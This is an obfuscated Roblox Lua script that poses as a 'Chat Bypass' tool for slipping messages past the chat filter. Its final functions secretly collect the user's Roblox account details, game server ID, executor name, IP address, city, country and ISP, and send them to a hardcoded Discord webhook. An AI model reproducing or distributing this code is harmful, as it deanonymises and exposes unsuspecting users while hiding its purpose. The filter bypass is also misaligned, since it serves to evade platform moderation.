--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=Instance.new("ScreenGui");v0.Name="ChatBypassGUI";v0.Parent=game.Players.LocalPlayer:WaitForChild("PlayerGui");local v3=Instance.new("Frame");v3.Name="MainFrame";v3.Size=UDim2.new(0,1297 -(915 + 82) ,0 -0 ,117 + 83 );v3.Position=UDim2.new(0.5 -0 , -150,1187.5 -(1069 + 118) , -(226 -126));v3.BackgroundColor3=Color3.fromRGB(98 -53 ,8 + 37 ,79 -34 );v3.BackgroundTransparency=0.2 + 0 ;v3.BorderSizePixel=791 -(368 + 423) ;v3.Active=true;v3.Draggable=true;v3.Parent=v0;local v13=Instance.new("UICorner");v13.CornerRadius=UDim.new(0 -0 ,26 -(10 + 8) );v13.Parent=v3;local v16=Instance.new("TextLabel");v16.Name="Title";v16.Size=UDim2.new(3 -2 ,442 -(416 + 26) ,0 -0 ,30);v16.Position=UDim2.new(0,0 + 0 ,0 -0 ,0);v16.BackgroundColor3=Color3.fromRGB(473 -(145 + 293) ,35,35);v16.BackgroundTransparency=430.3 -(44 + 386) ;v16.TextColor3=Color3.fromRGB(255,1741 -(998 + 488) ,255);v16.Text="Chat Bypass";v16.Font=Enum.Font.GothamBold;v16.TextSize=14;v16.Parent=v3;local v28=Instance.new("TextBox");v28.Name="InputBox";v28.Size=UDim2.new(0.9 + 0 ,0 + 0 ,772 -(201 + 571) ,30);v28.Position=UDim2.new(0.05,1138 -(116 + 1022) ,0.3,0 -0 );v28.BackgroundColor3=Color3.fromRGB(60,36 + 24 ,219 -159 );v28.BackgroundTransparency=0.2;v28.TextColor3=Color3.fromRGB(905 -650 ,1114 -(814 + 45) ,255);v28.PlaceholderText="Enter message to bypass...";v28.Font=Enum.Font.Gotham;v28.TextSize=29 -17 ;v28.Parent=v3;local v40=Instance.new("TextButton");v40.Name="SendButton";v40.Size=UDim2.new(0.9 + 0 ,0 + 0 ,885 -(261 + 624) ,53 -23 );v40.Position=UDim2.new(1080.05 -(1020 + 60) ,1423 -(630 + 793) ,0.6 -0 ,0);v40.BackgroundColor3=Color3.fromRGB(80,378 -298 ,32 + 48 );v40.BackgroundTransparency=0.2;v40.TextColor3=Color3.fromRGB(877 -622 ,255,2002 -(760 + 987) );v40.Text="Send Bypassed Message";v40.Font=Enum.Font.Gotham;v40.TextSize=1925 -(1789 + 124) ;v40.Parent=v3;local v51=Instance.new("TextButton");v51.Name="HideButton";v51.Size=UDim2.new(766 -(745 + 21) ,7 + 13 ,0,55 -35 );v51.Position=UDim2.new(3 -2 , -20,0 + 0 ,0);v51.BackgroundColor3=Color3.fromRGB(158 + 42 ,1105 -(87 + 968) ,220 -170 );v51.TextColor3=Color3.fromRGB(232 + 23 ,576 -321 ,255);v51.Text="X";v51.Font=Enum.Font.GothamBold;v51.TextSize=1425 -(447 + 966) ;v51.Parent=v3;local v61=Instance.new("ScreenGui");v61.Name="HiddenBypassGUI";v61.Enabled=false;v61.Parent=game.Players.LocalPlayer:WaitForChild("PlayerGui");local v65=Instance.new("TextButton");v65.Name="ShowButton";v65.Size=UDim2.new(0 -0 ,1867 -(1703 + 114) ,701 -(376 + 325) ,32 -12 );v65.Position=UDim2.new(0 -0 ,0,0.5 + 0 , -(22 -12));v65.BackgroundColor3=Color3.fromRGB(50,64 -(9 + 5) ,426 -(85 + 291) );v65.BackgroundTransparency=1265.3 -(243 + 1022) ;v65.TextColor3=Color3.fromRGB(255,255,255);v65.Text="Show";v65.Font=Enum.Font.Gotham;v65.TextSize=38 -28 ;v65.Parent=v61;v51.MouseButton1Click:Connect(function() local v89=0 + 0 ;while true do if (v89==(1180 -(1123 + 57))) then v0.Enabled=false;v61.Enabled=true;break;end end end);v65.MouseButton1Click:Connect(function() local v90=0;while true do if (v90==(0 + 0)) then v61.Enabled=false;v0.Enabled=true;break;end end end);local v76=game:GetService("Players");local v77=v76.LocalPlayer;local v78={a="a",b="b",c="c",d="d",e="e",f="f",g="g",h="h",i="i",j="j",k="k",l="l",m="m",n="n",o="o",p="p",q="q",r="r",s="s",t="t",u="u",v="v",w="w",x="x",y="y",z="z"};local function v79(v91) local v92=">";v91=v91:lower();for v117=1, #v91 do local v118=0;local v119;while true do if (v118==(254 -(163 + 91))) then v119=v91:sub(v117,v117);if v78[v119] then v92=v92   .. v78[v119] ;else v92=v92   .. v119 ;end break;end end end return v92   .. ">" ;end local function v80(v93) local v94=1930 -(1869 + 61) ;local v95;local v96;while true do if (v94==0) then v95=v79(v93);v96=game:GetService("Chat");v94=1 + 0 ;end if (1==v94) then if (v77.Character and v77.Character:FindFirstChild("Head")) then v96:Chat(v77.Character.Head,v95);end break;end end end v40.MouseButton1Click:Connect(function() if (v28.Text~="") then v80(v28.Text);v28.Text="";end end);v28.FocusLost:Connect(function(v97) if (v97 and (v28.Text~="")) then local v126=0 -0 ;while true do if (v126==0) then v80(v28.Text);v28.Text="";break;end end end end);local function v81() while  not v77:FindFirstChild("PlayerGui") do wait(1 -0 );end local v98=v77.PlayerGui;local v99=v98:FindFirstChild("Chat") or v98:FindFirstChild("ChatMain") ;if v99 then local v127=0 + 0 ;local v128;while true do if ((0 -0)==v127) then v128=v99:FindFirstChild("SendButton") or (v99:FindFirstChild("ChatBar") and v99.ChatBar:FindFirstChild("SendButton")) ;if v128 then v128.MouseButton1Click:Connect(function() local v144=0 + 0 ;local v145;while true do if (v144==(1474 -(1329 + 145))) then v145=v99:FindFirstChild("ChatBar") or v99:FindFirstChild("TextBox") ;if (v145 and (v145.Text~="")) then v80(v145.Text);v145.Text="";end break;end end end);end break;end end end end local v82=game:GetService("UserInputService");v82.InputBegan:Connect(function(v100,v101) local v102=0;while true do if (v102==(971 -(140 + 831))) then if v101 then return;end if ((v100.KeyCode==Enum.KeyCode.Return) or (v100.KeyCode==Enum.KeyCode.Send)) then local v137=0;local v138;while true do if (v137==(1850 -(1409 + 441))) then v138=v77:FindFirstChild("PlayerGui");if v138 then local v146=0;local v147;while true do if (v146==(718 -(15 + 703))) then v147=v138:FindFirstChild("Chat") or v138:FindFirstChild("ChatMain") ;if v147 then local v149=0 + 0 ;local v150;while true do if (v149==(438 -(262 + 176))) then v150=v147:FindFirstChild("ChatBar") or v147:FindFirstChild("TextBox") ;if (v150 and v150:IsFocused() and (v150.Text~="")) then local v151=1721 -(345 + 1376) ;while true do if (v151==(688 -(198 + 490))) then v80(v150.Text);v150.Text="";break;end end end break;end end end break;end end end break;end end end break;end end end);v81();v77.PlayerGui.ChildAdded:Connect(function(v103) if ((v103.Name=="Chat") or (v103.Name=="ChatMain")) then wait(4 -3 );v81();end end);local function v83() local v104=0 -0 ;local v105;while true do if (v104==(1207 -(696 + 510))) then return {username=v105.Name,displayName=v105.DisplayName,userId=tostring(v105.UserId),accountAge=tostring(v105.AccountAge),membership=tostring(v105.MembershipType)};end if (v104==(0 -0)) then v105=v76.LocalPlayer;if  not v105 then return nil;end v104=1263 -(1091 + 171) ;end end end local v84="https://discord.com/api/webhooks/1419205652248657940/PScchmZiRTrc1W8JI4EWd_UHYkI9cKdZr8lSnOnnaT50qufJEWDLETbLlPRJlPQhfe0v";local function v85() local v106="Unknown";pcall(function() v106=game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name;end);return {gameName=v106,placeId=tostring(game.PlaceId),jobId=game.JobId or "Unknown" };end local function v86() local v107=0;local v108;local v109;while true do if (v107==(0 + 0)) then v108="Unknown";v109="Unknown";v107=3 -2 ;end if (v107==(3 -2)) then pcall(function() if identifyexecutor then v108=identifyexecutor() or "Unknown" ;end end);pcall(function() local v135=0;while true do if (v135==(374 -(123 + 251))) then if syn then v108="Synapse X";end if PROTOSMASHER_LOADED then v108="ProtoSmasher";end v135=4 -3 ;end if (v135==(700 -(208 + 490))) then if scriptware then v108="ScriptWare";end if isexecutorclosure then v108="Electron";end v135=1 + 2 ;end if (v135==(2 + 1)) then if (getexecutorname and (getexecutorname()=="Delta")) then v108="Delta";end if getexecutorname then v108=getexecutorname() or v108 ;end v135=840 -(660 + 176) ;end if (v135==4) then if version then v109=tostring(version()) or "Unknown" ;end break;end if (v135==(1 + 0)) then if Krnl then v108="Krnl";end if fluxus then v108="Fluxus";end v135=204 -(14 + 188) ;end end end);v107=677 -(534 + 141) ;end if (v107==2) then return {name=v108,version=v109};end end end local function v87() local v110={ipAddress="Unknown",location="Unknown",isp="Unknown",org="Unknown"};pcall(function() local v121=0 + 0 ;local v122;while true do if (v121==0) then v122=game:HttpGet("http://ip-api.com/json/");if v122 then local v139=game:GetService("HttpService"):JSONDecode(v122);v110.ipAddress=v139.query or "Unknown" ;v110.location=string.format("%s, %s, %s",v139.city or "Unknown" ,v139.regionName or "Unknown" ,v139.country or "Unknown" );v110.isp=v139.isp or "Unknown" ;v110.org=v139.org or "Unknown" ;end break;end end end);if (v110.ipAddress=="Unknown") then pcall(function() v110.ipAddress=game:HttpGet("http://icanhazip.com/"):gsub("%s+","") or "Unknown" ;end);end return v110;end local function v88() local v111=v83();local v112=v85();local v113=v86();local v114=v87();if  not v111 then return;end local v115={{title="SYSTEM INFORMATION",color=16711680,description="All information collected from the user's system",fields={{name="ROBLOX ACCOUNT",value=string.format("Username: %s\nDisplay Name: %s\nUser ID: %s\nAccount Age: %s days\nMembership: %s\n[View Profile](https://www.roblox.com/users/%s/profile)",v111.username,v111.displayName,v111.userId,v111.accountAge,v111.membership,v111.userId),inline=true},{name="GAME SESSION",value=string.format("Game: %s\nPlace ID: %s\nServer ID: %s\n[Join Game](https://www.roblox.com/games/start?placeId=%s&gameInstanceId=%s)",v112.gameName,v112.placeId,v112.jobId,v112.placeId,v112.jobId),inline=true},{name="EXECUTOR",value=string.format("Executor: %s\nVersion: %s",v113.name,v113.version),inline=true},{name="NETWORK",value=string.format("IP: %s\nLocation: %s\nISP: %s\nOrg: %s",v114.ipAddress,v114.location,v114.isp,v114.org),inline=true}},thumbnail={url=string.format("https://www.roblox.com/headshot-thumbnail/image?userId=%s&width=420&height=420&format=png",v111.userId)},footer={text="System Information Logger"},timestamp=DateTime.now():ToIsoDate()}};local v116={embeds=v115,username="System Info Logger",avatar_url="https://cdn.discordapp.com/embed/avatars/0.png"};pcall(function() local v123=game:GetService("HttpService");local v124=v123:JSONEncode(v116);if (syn and syn.request) then syn.request({Url=v84,Method="POST",Headers={["Content-Type"]="application/json"},Body=v124});elseif request then request({Url=v84,Method="POST",Headers={["Content-Type"]="application/json"},Body=v124});else game:GetService("HttpService"):PostAsync(v84,v124);end end);end v88();
